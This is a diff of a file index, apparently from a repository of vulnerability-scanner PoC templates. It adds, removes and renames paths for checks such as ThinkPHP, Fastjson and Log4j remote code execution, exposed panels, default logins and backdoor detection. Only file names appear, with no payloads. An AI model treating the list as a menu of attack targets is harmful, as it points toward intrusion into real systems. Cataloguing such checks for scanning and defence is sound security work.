./poc/other/tectuus-scada-monitor.yaml ./poc/other/tekon-info-leak-10684.yaml -./poc/other/tekon-info-leak-10685.yaml +./poc/other/tekon-info-leak.yaml ./poc/other/tekton-dashboard.yaml ./poc/other/telefication-1c7925e1a8107c9a8d402138b26021c6.yaml ./poc/other/telefication.yaml @@ -76675,14 +76684,14 @@ ./poc/other/thinkadmin-workflow.yaml ./poc/other/thinkadmin.yaml ./poc/other/thinkcmf-arbitary.yaml +./poc/other/thinkcmf-arbitrary-code-execution-10715.yaml ./poc/other/thinkcmf-arbitrary-code-execution-10716.yaml -./poc/other/thinkcmf-arbitrary-code-execution.yaml ./poc/other/thinkcmf-file-include.yaml -./poc/other/thinkcmf-workflow-10730.yaml ./poc/other/thinkcmf-workflow-10731.yaml ./poc/other/thinkcmf-write-shell.yaml ./poc/other/thinkcmf-write-shell.yml ./poc/other/thinkcmf.yaml +./poc/other/thinkcmf_include.yaml ./poc/other/thinker-intelligentgateway.yaml ./poc/other/thinkmail.yaml ./poc/other/thinkox.yaml @@ -76805,8 +76814,8 @@ ./poc/other/tilda-publishing-2e54e8ceac13a46ad30a989ad6459e25.yaml ./poc/other/tilda-publishing.yaml ./poc/other/tileserver-gl-10785.yaml -./poc/other/tileserver-gl-10786.yaml ./poc/other/tileserver-gl-10787.yaml +./poc/other/tileserver-gl.yaml ./poc/other/timber-library-63f508e564b8a4abe97afab9c4153993.yaml ./poc/other/timber-library.yaml ./poc/other/time-sheets-01c399115e5a14d0d02b21cc32dc4267.yaml @@ -76990,7 +76999,6 @@ ./poc/other/topsec-vpn.yaml ./poc/other/topwalk-mtp.yaml ./poc/other/tor-socks-proxy-10810.yaml -./poc/other/tor-socks-proxy-10811.yaml ./poc/other/tor-socks-proxy-10812.yaml ./poc/other/tor-socks-proxy-10813.yaml ./poc/other/tor-socks-proxy.yaml @@ -77253,7 +77261,7 @@ ./poc/other/tutor-pro.yaml ./poc/other/tutor.yaml ./poc/other/tutortrac.yaml -./poc/other/tuxedo-connected-controller-10853.yaml +./poc/other/tuxedo-connected-controller-10852.yaml ./poc/other/tuxedo-connected-controller-10854.yaml ./poc/other/tuxedo-connected-controller-10855.yaml ./poc/other/tuxedo-connected-controller.yaml @@ -77311,7 +77319,7 @@ ./poc/other/twonkyserver.yaml ./poc/other/tx-onepager-fd882ece71ba4cff2902481918d2e498.yaml ./poc/other/tx-onepager.yaml -./poc/other/txt-fingerprint.yaml +./poc/other/txt-fingerprint-10863.yaml ./poc/other/typebot-d46f8d409dfd4cf2ebe7a24205b8fb3e.yaml ./poc/other/typebot.yaml ./poc/other/typecho.yaml @@ -77925,9 +77933,10 @@ ./poc/other/upnp-device.yaml ./poc/other/uportal.yaml ./poc/other/ups-status-1.yaml -./poc/other/ups-status-10983.yaml ./poc/other/ups-status-10984.yaml +./poc/other/ups-status-10985.yaml ./poc/other/ups-status-2.yaml +./poc/other/ups-status.yaml ./poc/other/upscale-179320c05c6c92e9b26b9cab26bf1bc3.yaml ./poc/other/upscale-8525917b8f35bb4eaf3e210e14fd7fa5.yaml ./poc/other/upscale-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -78834,8 +78843,8 @@ ./poc/other/wadi-survey-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/wadi-survey.yaml ./poc/other/wadl-files.yaml -./poc/other/wago-plc-panel-11091.yaml ./poc/other/wago-plc-panel-11092.yaml +./poc/other/wago-plc-panel-11093.yaml ./poc/other/wago-plc-panel.yaml ./poc/other/waiting-3a2e11dcd8f25a00fda1fc349dee7101.yaml ./poc/other/waiting-40a897868114df1ad9c34c81f8c4d443.yaml @@ -78853,7 +78862,7 @@ ./poc/other/walk-score.yaml ./poc/other/walker-core-c9d28ba9af7ff1cee52a47de51a62b8e.yaml ./poc/other/walker-core.yaml -./poc/other/wallix-accessmanager-panel-11094.yaml +./poc/other/wallix-accessmanager-panel-11095.yaml ./poc/other/wallix-accessmanager-panel.yaml ./poc/other/wallstreet-157cf14a019f2f39567d396451ba436d.yaml ./poc/other/wallstreet-7cccc28e1315b459e8b12f665a5d26e3.yaml @@ -79315,6 +79324,7 @@ ./poc/other/winterlock.yaml ./poc/other/winters.yaml ./poc/other/wireless-access-point-controller.yaml +./poc/other/wireless-leakage.yaml ./poc/other/wise-361b4625da00651d196bf168b5902896.yaml ./poc/other/wise-9099a88f255af571eb05254581f8054d.yaml ./poc/other/wise-chat-8c10bb16c734c3ae0e0598296078da6b.yaml @@ -79980,6 +79990,7 @@ ./poc/other/wooyun-2015-093724.yaml ./poc/other/wooyun-2015-096676.yaml ./poc/other/wooyun-2015-097832.yaml +./poc/other/wooyun-2015-148227(1).yaml ./poc/other/wooyun-2015-148227-11224.yaml ./poc/other/wooyun-2015-148227-11226.yaml ./poc/other/wooyun-2015-148227-11227.yaml @@ -80169,12 +80180,12 @@ ./poc/other/wsncm-iot.yaml ./poc/other/wsncm-system.yaml ./poc/other/wso2-2019-0598-11635.yaml -./poc/other/wso2-2019-0598-11636.yaml ./poc/other/wso2-carbon-server.yaml ./poc/other/wso2-management-console-11644.yaml ./poc/other/wso2-management-console-11645.yaml ./poc/other/wso2-management-console-11646.yaml ./poc/other/wso2-management-console.yaml +./poc/other/wso2mgmtconsole.yaml ./poc/other/wstmart.yaml ./poc/other/wti-like-post-801384ebb6b98e29bbc3da65ee0914d2.yaml ./poc/other/wti-like-post-c854ddc867a3e00f9bba9d6f39d622e4.yaml @@ -80233,7 +80244,7 @@ ./poc/other/xbrother-monitor.yaml ./poc/other/xcyg-system.yaml ./poc/other/xdoa-oa.yaml -./poc/other/xds-amr-status-11669.yaml +./poc/other/xds-amr-status-11668.yaml ./poc/other/xds-amr-status.yaml ./poc/other/xecure-vpn.yaml ./poc/other/xecurevpn.yaml @@ -80367,7 +80378,7 @@ ./poc/other/yarn-lock-11727.yaml ./poc/other/yarn-lock-11728.yaml ./poc/other/yarn-lock-11729.yaml -./poc/other/yarn-lock.yaml +./poc/other/yarn-lock-11730.yaml ./poc/other/yatra-cbaa3d03ba7367a64c11c6690f1f36b8.yaml ./poc/other/yatra.yaml ./poc/other/yatri-tools-45a4d9b5b716af9eb5f5cf5c683a0860.yaml @@ -80502,7 +80513,7 @@ ./poc/other/yop-poll-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/yop-poll-plugin.yaml ./poc/other/yop-poll.yaml -./poc/other/yopass-panel-11749.yaml +./poc/other/yopass-panel-11750.yaml ./poc/other/yopass-panel.yaml ./poc/other/yottabyte-rizhiyi.yaml ./poc/other/you-shang-3047371f5c7a9995238b090856ba5be3.yaml @@ -80605,9 +80616,9 @@ ./poc/other/z-downloads-b66f566f59564af0ab02d18ddeb7643f.yaml ./poc/other/z-downloads.yaml ./poc/other/z-url-preview.yaml -./poc/other/zabbix-dashboards-access-11754.yaml ./poc/other/zabbix-dashboards-access-11755.yaml ./poc/other/zabbix-dashboards-access-11756.yaml +./poc/other/zabbix-dashboards-access-11757.yaml ./poc/other/zabbix-dashboards-access.yaml ./poc/other/zabbix-error-11764.yaml ./poc/other/zabbix-error-11765.yaml @@ -80720,10 +80731,8 @@ ./poc/other/zhiyuan-fileRead.yaml ./poc/other/zhiyuan-oa-info-leak-11797.yaml ./poc/other/zhiyuan-oa-info-leak-11798.yaml -./poc/other/zhiyuan-oa-info-leak-11799.yaml -./poc/other/zhiyuan-oa-info-leak.yaml +./poc/other/zhiyuan-oa-info-leak-11800.yaml ./poc/other/zhongan-xdecision.yaml -./poc/other/zhongkewangwei-fileread.yaml ./poc/other/zhongshengsoft-crm.yaml ./poc/other/zhongtan-ndstart.yaml ./poc/other/zhongyou-system.yaml @@ -80848,7 +80857,7 @@ ./poc/other/zte-iad语音网关.yaml ./poc/other/zte-panel-11838.yaml ./poc/other/zte-panel-11839.yaml -./poc/other/zte-panel-11841.yaml +./poc/other/zte-panel-11840.yaml ./poc/other/zte-panel.yaml ./poc/other/zte-zxsec统一安全网关.yaml ./poc/other/zuitu.yaml @@ -81052,6 +81061,7 @@ ./poc/perl/perl-scanner.yaml ./poc/perl/perl-status-9485.yaml ./poc/perl/perl-status-9486.yaml +./poc/perl/perl-status-9487.yaml ./poc/perl/perl-status-page.yaml ./poc/perl/superlist-5da18e3bfe18177f7ef82fb6ae815fe6.yaml ./poc/perl/superlist-ca628bb2dee1036910f5dc781a4bf2d7.yaml @@ -81117,9 +81127,8 @@ ./poc/php/bohuangwanglong-cmd-php-rce.yaml ./poc/php/bsphp-nauthorized-access.yaml ./poc/php/btoptionscom-hbr_php-sqli.yaml -./poc/php/clockwork-php-page-1016.yaml ./poc/php/clockwork-php-page-1017.yaml -./poc/php/clockwork-php-page-1018.yaml +./poc/php/clockwork-php-page-1019.yaml ./poc/php/clockwork-php-page.yaml ./poc/php/cmseasy-crossall-act-php-sql-injection.yaml ./poc/php/config.php.new.yaml @@ -81179,7 +81188,7 @@ ./poc/php/php-backup-files-7.yaml ./poc/php/php-backup-files-8.yaml ./poc/php/php-backup-files-9.yaml -./poc/php/php-backup-files-9497.yaml +./poc/php/php-backup-files-9498.yaml ./poc/php/php-backup-files.yaml ./poc/php/php-cgi-cve-2012-1823.yml ./poc/php/php-cloud.yaml @@ -81189,6 +81198,7 @@ ./poc/php/php-csl.yaml ./poc/php/php-debug-bar-9504.yaml ./poc/php/php-debug-bar-9506.yaml +./poc/php/php-debug-bar-9507.yaml ./poc/php/php-debug-bar.yaml ./poc/php/php-debugbar-exposure.yaml ./poc/php/php-errors-9508.yaml @@ -81211,7 +81221,7 @@ ./poc/php/php-execution-plugin-957e976543e32e293e63308621e43787.yaml ./poc/php/php-execution-plugin.yaml ./poc/php/php-fpm-config-9513.yaml -./poc/php/php-fpm-config.yaml +./poc/php/php-fpm-config-9514.yaml ./poc/php/php-fpm-status-9515.yaml ./poc/php/php-fpm-status-9516.yaml ./poc/php/php-fpm-status.yaml @@ -81223,7 +81233,7 @@ ./poc/php/php-proxy-detect-1.yaml ./poc/php/php-proxy-detect-2.yaml ./poc/php/php-proxy-detect-9544.yaml -./poc/php/php-proxy-detect-9545.yaml +./poc/php/php-proxy-detect.yaml ./poc/php/php-scanner-9547.yaml ./poc/php/php-server-monitor.yaml ./poc/php/php-shell-0771e0dee276537bea17fe994946d6c2.yaml @@ -81235,10 +81245,11 @@ ./poc/php/php-shell.yaml ./poc/php/php-support-tickets.yaml ./poc/php/php-symfony-debug.yaml +./poc/php/php-timeclock-xss-9550.yaml ./poc/php/php-timeclock-xss-9551.yaml ./poc/php/php-timeclock-xss-9552.yaml -./poc/php/php-timeclock-xss-9553.yaml ./poc/php/php-timeclock-xss-9554.yaml +./poc/php/php-timeclock-xss.yaml ./poc/php/php-to-page-e4781ed7ffbbfa6cd8ed7141a7a77596.yaml ./poc/php/php-to-page.yaml ./poc/php/php-user-ini-disclosure-1.yaml @@ -81248,9 +81259,9 @@ ./poc/php/php-user-ini-disclosure.yaml ./poc/php/php-user-ini.yaml ./poc/php/php-voting-system.yaml -./poc/php/php-warning-9562.yaml ./poc/php/php-warning-9563.yaml ./poc/php/php-warning.yaml +./poc/php/php-zerodium-backdoor-rce-9569.yaml ./poc/php/php-zerodium-backdoor-rce-9570.yaml ./poc/php/php-zerodium-backdoor-rce-9571.yaml ./poc/php/php-zerodium-backdoor-rce-9572.yaml @@ -81264,11 +81275,12 @@ ./poc/php/phpbb.yaml ./poc/php/phpcms-cve-2018-19127.yml ./poc/php/phpcms.yaml +./poc/php/phpcollab-detect-9499.yaml ./poc/php/phpcollab-detect-9500.yaml -./poc/php/phpcollab-detect-9501.yaml ./poc/php/phpcollab-detect.yaml ./poc/php/phpcollab-panel.yaml ./poc/php/phpcollab-workflow-9502.yaml +./poc/php/phpcollab-workflow.yaml ./poc/php/phpcollab.yaml ./poc/php/phpdealerlocator.yaml ./poc/php/phpdenora.yaml @@ -81298,10 +81310,10 @@ ./poc/php/phpinfo-9518.yaml ./poc/php/phpinfo-9519.yaml ./poc/php/phpinfo-9520.yaml +./poc/php/phpinfo-9521.yaml ./poc/php/phpinfo-9522.yaml ./poc/php/phpinfo-disclosure-env.yaml ./poc/php/phpinfo-disclosure.yaml -./poc/php/phpinfo-files.yaml ./poc/php/phpinfo-wp-c0df604fc0503d1e14b960207dc5dc5d.yaml ./poc/php/phpinfo-wp.yaml ./poc/php/phpinfo.yaml @@ -81330,22 +81342,22 @@ ./poc/php/phpmyadmin-panel-7.yaml ./poc/php/phpmyadmin-panel-8.yaml ./poc/php/phpmyadmin-panel-9.yaml -./poc/php/phpmyadmin-panel-9525.yaml +./poc/php/phpmyadmin-panel-9526.yaml ./poc/php/phpmyadmin-panel-9527.yaml ./poc/php/phpmyadmin-panel-9528.yaml ./poc/php/phpmyadmin-panel.yaml ./poc/php/phpmyadmin-server-import.yaml -./poc/php/phpmyadmin-setup(1).yaml ./poc/php/phpmyadmin-setup-11857.yaml ./poc/php/phpmyadmin-setup-9529.yaml ./poc/php/phpmyadmin-setup-9530.yaml +./poc/php/phpmyadmin-setup-9531.yaml ./poc/php/phpmyadmin-setup-9532.yaml ./poc/php/phpmyadmin-setup-9533.yaml ./poc/php/phpmyadmin-setup-deserialization.yaml ./poc/php/phpmyadmin-setup-deserialization.yml ./poc/php/phpmyadmin-setup.yaml ./poc/php/phpmyadmin-sql-9534.yaml -./poc/php/phpmyadmin-sql-9535.yaml +./poc/php/phpmyadmin-sql-9536.yaml ./poc/php/phpmyadmin-sql.php-server-1.yaml ./poc/php/phpmyadmin-sql.php-server-2.yaml ./poc/php/phpmyadmin-sql.php-server.yaml @@ -81368,6 +81380,7 @@ ./poc/php/phpopenchat.yaml ./poc/php/phppgadmin-panel-9539.yaml ./poc/php/phppgadmin-panel-9540.yaml +./poc/php/phppgadmin-panel-9541.yaml ./poc/php/phppgadmin-panel-9542.yaml ./poc/php/phppgadmin-panel-9543.yaml ./poc/php/phppgadmin-panel.yaml @@ -81390,18 +81403,16 @@ ./poc/php/phpsword-favicon-manager.yaml ./poc/php/phpsysinfo.yaml ./poc/php/phpunit-9555.yaml -./poc/php/phpunit-9557.yaml +./poc/php/phpunit-9556.yaml ./poc/php/phpunit-9558.yaml ./poc/php/phpunit-cve-2017-9841-rce.yml ./poc/php/phpunit-result-cache-exposure.yaml -./poc/php/phpunit.yaml ./poc/php/phpweb.yaml ./poc/php/phpwiki-lfi-9564.yaml ./poc/php/phpwiki-lfi-9565.yaml ./poc/php/phpwiki-lfi-9566.yaml ./poc/php/phpwiki-lfi-9567.yaml ./poc/php/phpwiki-lfi-9568.yaml -./poc/php/phpwiki-lfi.yaml ./poc/php/phpwiki-workflow.yaml ./poc/php/phpwiki.yaml ./poc/php/phpwind-installer.yaml @@ -81416,6 +81427,7 @@ ./poc/php/ruijie-eg-tool-view-phpinfo-infoleak.yaml ./poc/php/ruijie-eg-update-php-rce.yaml ./poc/php/ruijie-phpinfo-9950.yaml +./poc/php/ruijie-phpinfo-9951.yaml ./poc/php/ruijie-phpinfo-9952.yaml ./poc/php/ruijie-phpinfo-9953.yaml ./poc/php/samphpweb.yaml @@ -81436,13 +81448,13 @@ ./poc/php/simplesamlphp-authentication-f3c175d78e12da649ab69deea15f1f42.yaml ./poc/php/simplesamlphp-authentication.yaml ./poc/php/symfony-phpinfo.yaml -./poc/php/thinkphp-2-rce-10738.yaml ./poc/php/thinkphp-2-rce-10739.yaml +./poc/php/thinkphp-2-rce-10740.yaml ./poc/php/thinkphp-2-rce-10741.yaml ./poc/php/thinkphp-30-rce.yaml ./poc/php/thinkphp-50-rce.yaml ./poc/php/thinkphp-501-rce-10742.yaml -./poc/php/thinkphp-501-rce.yaml +./poc/php/thinkphp-501-rce-10743.yaml ./poc/php/thinkphp-5010-rce.yaml ./poc/php/thinkphp-5022-5129-rce.yaml ./poc/php/thinkphp-5022-rce-10744.yaml @@ -81454,6 +81466,7 @@ ./poc/php/thinkphp-5023-rce-10751.yaml ./poc/php/thinkphp-5024-5130-rce.yaml ./poc/php/thinkphp-509-information-disclosure-10752.yaml +./poc/php/thinkphp-509-information-disclosure-10753.yaml ./poc/php/thinkphp-509-information-disclosure-10754.yaml ./poc/php/thinkphp-509-information-disclosure-10755.yaml ./poc/php/thinkphp-509-information-disclosure.yaml @@ -81510,6 +81523,7 @@ ./poc/php/wp-php-widget-e27de43f3c3dd5df388335d72559f433.yaml ./poc/php/wp-php-widget.yaml ./poc/php/wp-phpfreechat-xss-11524.yaml +./poc/php/wp-phpfreechat-xss-11525.yaml ./poc/php/wp-phpfreechat-xss-11526.yaml ./poc/php/wp-phpfreechat-xss-11527.yaml ./poc/php/wp-phpfreechat-xss-11528.yaml @@ -81537,17 +81551,17 @@ ./poc/python/Django-DebugMode.yaml ./poc/python/autobahn-python-detect-592.yaml ./poc/python/autobahn-python-detect-593.yaml +./poc/python/autobahn-python-detect-594.yaml ./poc/python/autobahn-python-detect-595.yaml -./poc/python/default-django-page-6840.yaml ./poc/python/default-django-page-6841.yaml ./poc/python/default-django-page-6842.yaml ./poc/python/default-django-page-6843.yaml -./poc/python/django-admin-panel-7021.yaml +./poc/python/default-django-page.yaml ./poc/python/django-admin-panel-7022.yaml +./poc/python/django-admin-panel-7023.yaml ./poc/python/django-admin-panel.yaml ./poc/python/django-debug-detect-7024.yaml ./poc/python/django-debug-detect-7025.yaml -./poc/python/django-debug-detect-7026.yaml ./poc/python/django-debug-detect-7027.yaml ./poc/python/django-debug-detect.yaml ./poc/python/django-debug-enable.yaml @@ -81560,24 +81574,26 @@ ./poc/python/django-debug-exposure.yaml ./poc/python/django-debug-toolbar.yaml ./poc/python/django-debug-v2.yaml -./poc/python/django-debug.yml +./poc/python/django-debug.yaml ./poc/python/django-debugmode-11848.yaml ./poc/python/django-debugmode.yaml ./poc/python/django-directory-traversal.yaml ./poc/python/django-framework-exceptions-7033.yaml ./poc/python/django-framework-exceptions-7034.yaml ./poc/python/django-rest-framework.yaml -./poc/python/django-secret.key.yaml +./poc/python/django-secret-key.yaml ./poc/python/django.yaml ./poc/python/djangodebug.yaml ./poc/python/flask-redis-docker.yaml ./poc/python/flask-werkzeug-debug.yaml +./poc/python/jupyter-ipython-unauth-8402.yaml ./poc/python/jupyter-ipython-unauth-8404.yaml ./poc/python/jupyter-ipython-unauth-8405.yaml ./poc/python/jupyter-ipython-unauth.yaml -./poc/python/python-app-sql-exceptions-9744.yaml +./poc/python/python-app-sql-exceptions.yaml ./poc/python/python-metrics-9745.yaml ./poc/python/python-metrics-9746.yaml +./poc/python/python-metrics-9747.yaml ./poc/python/python-phish.yaml ./poc/python/python-scanner-9748.yaml ./poc/rabbitmq/rabbitmq-config-exposure.yml @@ -81592,8 +81608,6 @@ ./poc/rabbitmq/rabbitmq-default-login-9783.yaml ./poc/rabbitmq/rabbitmq-default-login-9784.yaml ./poc/rabbitmq/rabbitmq-default-login-9785.yaml -./poc/rabbitmq/rabbitmq-default-login-9786.yaml -./poc/rabbitmq/rabbitmq-default-login.yaml ./poc/rabbitmq/rabbitmq-default-password.yaml ./poc/rabbitmq/rabbitmq-default-password.yml ./poc/rabbitmq/rabbitmq-exporter-metrics.yaml @@ -81602,7 +81616,6 @@ ./poc/rabbitmq/rabbitmq-workflow.yaml ./poc/rabbitmq/rabbitmq.yaml ./poc/redis/exposed-redis-7335.yaml -./poc/redis/exposed-redis-7336.yaml ./poc/redis/exposed-redis-7337.yaml ./poc/redis/exposed-redis-7338.yaml ./poc/redis/exposed-redis-7339.yaml @@ -81809,6 +81822,7 @@ ./poc/remote_code_execution/apache-filename-brute-force-353.yaml ./poc/remote_code_execution/apache-filename-brute-force.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-355.yaml +./poc/remote_code_execution/apache-flink-unauth-rce-356.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-357.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-358.yaml ./poc/remote_code_execution/apache-flink-unauth-rce-359.yaml @@ -81817,9 +81831,9 @@ ./poc/remote_code_execution/apache-httpd-rce-362.yaml ./poc/remote_code_execution/apache-httpd-rce-363.yaml ./poc/remote_code_execution/apache-httpd-rce.yaml -./poc/remote_code_execution/apache-ofbiz-log4j-rce-366.yaml +./poc/remote_code_execution/apache-nifi-rce.yaml +./poc/remote_code_execution/apache-ofbiz-log4j-rce.yaml ./poc/remote_code_execution/apache-solr-91-rce.yaml -./poc/remote_code_execution/apache-solr-log4j-rce-372.yaml ./poc/remote_code_execution/apache-solr-log4j-rce.yaml ./poc/remote_code_execution/apache-solr-rce.yaml ./poc/remote_code_execution/apache-spark-rce.yaml @@ -81974,7 +81988,7 @@ ./poc/remote_code_execution/choice-payment-gateway-for-woocommerce-5989797b3de4a7d046b22faa41f147a5.yaml ./poc/remote_code_execution/choice-payment-gateway-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/choice-payment-gateway-for-woocommerce.yaml -./poc/remote_code_execution/cisco-cloudcenter-suite-rce.yaml +./poc/remote_code_execution/cisco-cloudcenter-suite-log4j-rce.yaml ./poc/remote_code_execution/cisco-rv-series-rce.yaml ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-450f3fa1fdfaa0d436f04229a0397315.yaml ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -81983,7 +81997,7 @@ ./poc/remote_code_execution/clearpay-gateway-for-woocommerce-plugin.yaml ./poc/remote_code_execution/clearpay-gateway-for-woocommerce.yaml ./poc/remote_code_execution/clockwatch-enterprise-rce-1008.yaml -./poc/remote_code_execution/clockwatch-enterprise-rce-1009.yaml +./poc/remote_code_execution/clockwatch-enterprise-rce-1010.yaml ./poc/remote_code_execution/clockwatch-enterprise-rce-1011.yaml ./poc/remote_code_execution/co2ok-for-woocommerce-111032b9706968c14c7d64c4f7dfc20e.yaml ./poc/remote_code_execution/co2ok-for-woocommerce-5a72e600d911398f0a295fcf76a6c0a4.yaml @@ -81998,7 +82012,6 @@ ./poc/remote_code_execution/co2ok-for-woocommerce.yaml ./poc/remote_code_execution/code42-log4j-rce-1130.yaml ./poc/remote_code_execution/code42-log4j-rce-1132.yaml -./poc/remote_code_execution/code42-log4j-rce.yaml ./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-0524990b8a93f2e726c050d49aa0b22e.yaml ./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-3574e2251d76d53bdcc685462fdb0300.yaml ./poc/remote_code_execution/codup-woocommerce-dynamic-pricing-table-view-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -82029,10 +82042,10 @@ ./poc/remote_code_execution/consul-rexec-rce.yml ./poc/remote_code_execution/consul-service-rce.yaml ./poc/remote_code_execution/consul-service-rce.yml +./poc/remote_code_execution/core-chuangtian-cloud-rce-1207.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1208.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1209.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1210.yaml -./poc/remote_code_execution/core-chuangtian-cloud-rce-1211.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce-1212.yaml ./poc/remote_code_execution/core-chuangtian-cloud-rce.yaml ./poc/remote_code_execution/cost-of-goods-for-woocommerce-29aeaa3c6bb2e136205e4a60d94d44f4.yaml @@ -82266,8 +82279,6 @@ ./poc/remote_code_execution/elex-woocommerce-google-product-feed-plugin-basic-plugin.yaml ./poc/remote_code_execution/elex-woocommerce-google-product-feed-plugin-basic.yaml ./poc/remote_code_execution/elex-woocommerce-xss-7199.yaml -./poc/remote_code_execution/elex-woocommerce-xss-7200.yaml -./poc/remote_code_execution/elex-woocommerce-xss.yaml ./poc/remote_code_execution/elfinder-rce.yaml ./poc/remote_code_execution/email-customizer-for-woocommerce-2a0fbc617737467a0c1230deb2588849.yaml ./poc/remote_code_execution/email-customizer-for-woocommerce.yaml @@ -82333,6 +82344,7 @@ ./poc/remote_code_execution/exportfeed-list-woocommerce-products-on-ebay-store.yaml ./poc/remote_code_execution/extra-product-options-for-woocommerce-e27c95006efb42b161db220e372bc1d5.yaml ./poc/remote_code_execution/extra-product-options-for-woocommerce.yaml +./poc/remote_code_execution/eyou-email-rce-7378.yaml ./poc/remote_code_execution/eyou-email-rce-7379.yaml ./poc/remote_code_execution/eyou-email-rce-7380.yaml ./poc/remote_code_execution/eyou-email-rce-7381.yaml @@ -82355,6 +82367,7 @@ ./poc/remote_code_execution/fastjson-1-2-41-rce-7401.yaml ./poc/remote_code_execution/fastjson-1-2-41-rce-7403.yaml ./poc/remote_code_execution/fastjson-1-2-41-rce-7404.yaml +./poc/remote_code_execution/fastjson-1-2-41-rce.yaml ./poc/remote_code_execution/fastjson-1-2-42-rce-7405.yaml ./poc/remote_code_execution/fastjson-1-2-42-rce-7407.yaml ./poc/remote_code_execution/fastjson-1-2-42-rce-7408.yaml @@ -82362,6 +82375,7 @@ ./poc/remote_code_execution/fastjson-1-2-43-rce-7411.yaml ./poc/remote_code_execution/fastjson-1-2-43-rce-7412.yaml ./poc/remote_code_execution/fastjson-1-2-47-rce-7413.yaml +./poc/remote_code_execution/fastjson-1-2-47-rce-7415.yaml ./poc/remote_code_execution/fastjson-1-2-47-rce-7416.yaml ./poc/remote_code_execution/fastjson-1-2-62-rce-7417.yaml ./poc/remote_code_execution/fastjson-1-2-62-rce-7419.yaml @@ -82369,10 +82383,10 @@ ./poc/remote_code_execution/fastjson-1-2-67-rce-7421.yaml ./poc/remote_code_execution/fastjson-1-2-67-rce-7423.yaml ./poc/remote_code_execution/fastjson-1-2-67-rce-7424.yaml +./poc/remote_code_execution/fastjson-1-2-67-rce.yaml ./poc/remote_code_execution/fastjson-1-2-68-rce-1.yaml ./poc/remote_code_execution/fastjson-1-2-68-rce-2.yaml ./poc/remote_code_execution/fastjson-1-2-68-rce-3.yaml -./poc/remote_code_execution/fastjson-1-2-68-rce-7425.yaml ./poc/remote_code_execution/fastjson-1-2-68-rce.yaml ./poc/remote_code_execution/fastjson-1.2.24-rce-1.yaml ./poc/remote_code_execution/fastjson-1.2.24-rce-2.yaml @@ -82452,6 +82466,7 @@ ./poc/remote_code_execution/gitlab-rce-7691.yaml ./poc/remote_code_execution/gitlab-rce-7692.yaml ./poc/remote_code_execution/gitlab-rce-7693.yaml +./poc/remote_code_execution/gitlab-rce.yaml ./poc/remote_code_execution/gitlist-rce-cve-2018-1000533.yml ./poc/remote_code_execution/gitlistrce.yaml ./poc/remote_code_execution/giveaways-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml @@ -82475,12 +82490,14 @@ ./poc/remote_code_execution/growforce-email.yaml ./poc/remote_code_execution/gs-woocommerce-products-slider-40e429f2a997f5ab4138e41fb24dc3de.yaml ./poc/remote_code_execution/gs-woocommerce-products-slider.yaml +./poc/remote_code_execution/h3c-imc-rce-7868.yaml ./poc/remote_code_execution/h3c-imc-rce-7869.yaml ./poc/remote_code_execution/h3c-imc-rce-7870.yaml ./poc/remote_code_execution/h3c-imc-rce-7871.yaml ./poc/remote_code_execution/h3c-imc-rce.yml ./poc/remote_code_execution/hanta-rce.yaml ./poc/remote_code_execution/hashicorp-consul-rce-7890.yaml +./poc/remote_code_execution/hashicorp-consul-rce-7891.yaml ./poc/remote_code_execution/hashicorp-consul-rce-7892.yaml ./poc/remote_code_execution/hashicorp-consul-rce-7893.yaml ./poc/remote_code_execution/hashicorp-consul-rce-7894.yaml @@ -82516,11 +82533,11 @@ ./poc/remote_code_execution/ibtana-ecommerce-product-addons-plugin.yaml ./poc/remote_code_execution/ibtana-ecommerce-product-addons.yaml ./poc/remote_code_execution/icewarp-webclient-basic-rce.yaml +./poc/remote_code_execution/icewarp-webclient-rce-8129.yaml ./poc/remote_code_execution/icewarp-webclient-rce-8130.yaml ./poc/remote_code_execution/icewarp-webclient-rce-8131.yaml ./poc/remote_code_execution/icewarp-webclient-rce-8132.yaml ./poc/remote_code_execution/icewarp-webclient-rce-8133.yaml -./poc/remote_code_execution/icewarp-webclient-rce.yaml ./poc/remote_code_execution/image-source-control-isc-1f038aef0dcbd62c1999c43ff0e6ea69.yaml ./poc/remote_code_execution/image-source-control-isc-1f88dbd2b9c2d6237e296e8c6c1659c5.yaml ./poc/remote_code_execution/image-source-control-isc.yaml @@ -82640,10 +82657,11 @@ ./poc/remote_code_execution/lotuscms-rce-2.yaml ./poc/remote_code_execution/lotuscms-rce-8650.yaml ./poc/remote_code_execution/lotuscms-rce-8651.yaml -./poc/remote_code_execution/lotuscms-rce-8652.yaml +./poc/remote_code_execution/lotuscms-rce-8653.yaml ./poc/remote_code_execution/maccms-rce.yaml ./poc/remote_code_execution/maccms-rce.yml ./poc/remote_code_execution/maian-cart-preauth-rce-8720.yaml +./poc/remote_code_execution/maian-cart-preauth-rce-8721.yaml ./poc/remote_code_execution/maian-cart-preauth-rce.yaml ./poc/remote_code_execution/mailchimp-for-woocommerce-393bf93d00539e2cf5407ae88fccf981.yaml ./poc/remote_code_execution/mailchimp-for-woocommerce-f13ebe55d9f1704df1b6abd670ffb856.yaml @@ -82657,7 +82675,7 @@ ./poc/remote_code_execution/mcafee-epo-rce-8790.yaml ./poc/remote_code_execution/mcafee-epo-rce-8791.yaml ./poc/remote_code_execution/mcafee-epo-rce-8792.yaml -./poc/remote_code_execution/mcafee-epo-rce-8793.yaml +./poc/remote_code_execution/mcafee-epo-rce-8794.yaml ./poc/remote_code_execution/mcafee-epo-rce.yaml ./poc/remote_code_execution/mediaburst-ecommerce-sms-notifications-6e9ad46ba7b82908596d92a906a7c328.yaml ./poc/remote_code_execution/mediaburst-ecommerce-sms-notifications.yaml @@ -82666,6 +82684,7 @@ 